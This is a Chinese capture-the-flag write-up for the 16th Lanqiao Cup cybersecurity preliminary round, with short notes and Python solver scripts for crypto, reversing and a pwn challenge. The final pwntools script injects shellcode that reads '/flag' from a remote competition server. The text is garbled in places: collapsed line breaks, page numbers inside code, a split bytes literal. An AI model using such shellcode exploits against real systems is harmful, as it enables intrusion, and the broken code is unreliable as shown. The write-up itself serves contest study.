第十六届蓝桥杯网安初赛wp

解题列表

根据提示一步一步走，经过猜测，测试出app.py

经过仔细研读代码，找到密钥

编写python代码拿到flag

key = 'secret_key9828'
flag='d9d1c4d9e0d6c29e9aad71696565d99bc8d892a8979ec7a69b9a6868a095c8d89dac91d19ba9716f63b5'
new=bytearray()
flag=bytes.fromhex(flag)
for i in range(len(flag)):decrypt=flag[i]-ord(key[i%len(key)])new.append(decrypt)
print(new)

打开之后，经过翻找得到flag

使用分析工具CTF-NetA-V0.3.0一把梭

在cyberchef解密即可

from Cryptodome.Cipher import AES

b = {

'7': ['3', '4', '5', '6', '7', '8', '9', 'a', 'b'],

'4': ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b'],

'a': ['a', 'b', 'c', 'd', 'e', 'f'],

'e': ['c', 'd'],

'b': ['9', 'a', 'b', 'c', 'd'],

'3': ['1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd'],

'5': ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'a'],

'6': ['4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd'],

'c': ['0', '1', '2', '3'],

'f': ['7'],

'd': ['c', 'd', 'e'],

'1': ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd',

'e'],

'9': ['0', '1', '2', '3', '4', '5', '6'],

'0': ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd',

'e', 'f']

}

gift = 64698960125130294692475067384121553664

key1_hex = "74aeb356c6eb74f364cd316497c0f714"

cipher =

b'6\xbf\x9b\xb1\x93\x14\x82\x9a\xa4\xc2\xaf\xd0L\xad\xbb5\x0e|>\x8c|\xf0^dl~X\xc

7R\xcaZ\xab\x16\xbe r\xf6Pl\xe0\x93\xfc)\x0e\x93\x8e\xd3\xd6'

char_to_num = {f"{i:x}": i for i in range(16)}

b_numeric = {}

for k in b:

k_num = char_to_num[k]

b_numeric[k_num] = [char_to_num[c] for c in b[k]]

key1_digits = [char_to_num[c] for c in key1_hex]

gift_bin = bin(gift)[2:].zfill(128)

18 / 21gift_nibbles = [int(gift_bin[i*4 : (i+1)*4], 2) for i in range(32)]

candidates = []

for i in range(32):

k = key1_digits[i]

g = gift_nibbles[i]

user_candidates = b_numeric.get(k, list(range(16)))

valid_candidates = [c for c in user_candidates if (c & k) == g]

candidates.append(valid_candidates)

def solve():

used = [False] * 16

mapping = {}

def backtrack(pos):

if pos == 32:

key0_digits = [mapping[k] for k in key1_digits]

key0_hex = "".join(f"{c:x}" for c in key0_digits)

try:

aes0 = AES.new(bytes.fromhex(key0_hex), AES.MODE_CBC,

bytes.fromhex(key1_hex))

aes1 = AES.new(bytes.fromhex(key1_hex), AES.MODE_CBC,

bytes.fromhex(key0_hex))

plaintext = aes0.decrypt(aes1.encrypt(cipher))

if b"flag{" in plaintext:

print("Found valid key0:", key0_hex)

print("Flag:", plaintext.decode())

return True

except:

pass

return False

k = key1_digits[pos]

if k in mapping:

return backtrack(pos + 1)

for c in candidates[pos]:

if not used[c]:

valid = True

for future_pos in range(pos+1, 32):

future_k = key1_digits[future_pos]

if future_k == k:

19 / 21future_g = gift_nibbles[future_pos]

if (c & future_k) != future_g:

valid = False

break

if not valid:

continue

used[c] = True

mapping[k] = c

if backtrack(pos + 1):

return True

del mapping[k]

used[c] = False

return False

sorted_positions = sorted(range(32), key=lambda x: len(candidates[x]))

return backtrack(0)

if not solve():

print("No valid mapping found.")

block = [0x00, 0x05, 0x83, 0x80, 0x8E, 0x2B, 0x00, 0x83, 0x2F, 0xAA, 0x2B, 0x81, 0xA8, 0xA5]
v17 = [0x13, 0x39, 0xBE, 0xBE, 0xB4, 0x38, 0xB8, 0xBA, 0xBB, 0xB4, 0x3E, 0x90, 0x3A, 0xBA, 0xB4]
v16 = [0x8B, 0x89, 0x22, 0x88, 0x8B, 0x20, 0x09, 0x22, 0x88, 0x08, 0x8D, 0x88, 0xAF]key1 = 0x99 ^ 0xFF
key2 = 0xDD ^ 0x99
key3 = 0xFF ^ 0xDDdef left_shift(byte):return ((byte << 1) | (byte >> 7)) & 0xFFdef xor_operation(data, length, key):result = []for i in range(length):new_byte = key ^ left_shift(data[i])result.append(new_byte)return resultresult1 = xor_operation(block, 14, key1)
result2 = xor_operation(v17, 15, key2)
result3 = xor_operation(v16, 13, key3)
flag = ''.join(map(chr, result1 + result2 + result3))
print(flag)

from pwn import *
# p = process(r'D:\桌面\lllqqq\RuneBreach_331d31358bec3706d88a7bbe11e12bee\chall')
p = remote('8.147.132.32', 19652)
context(arch='amd64', os='linux', log_level='debug')
for _ in range(4):
p.recvuntil(b'Defend? (y/N): ')
p.sendline(b'n')
p.recvuntil(b'Your place is mine now ')
shell_addr = int(p.recvuntil(b'!\n', drop=True), 16)
print('exec_area:', hex(shell_addr))
shellcode = asm(shellcraft.cat('/flag'))
p.sendline(shellcode)
p.interactive()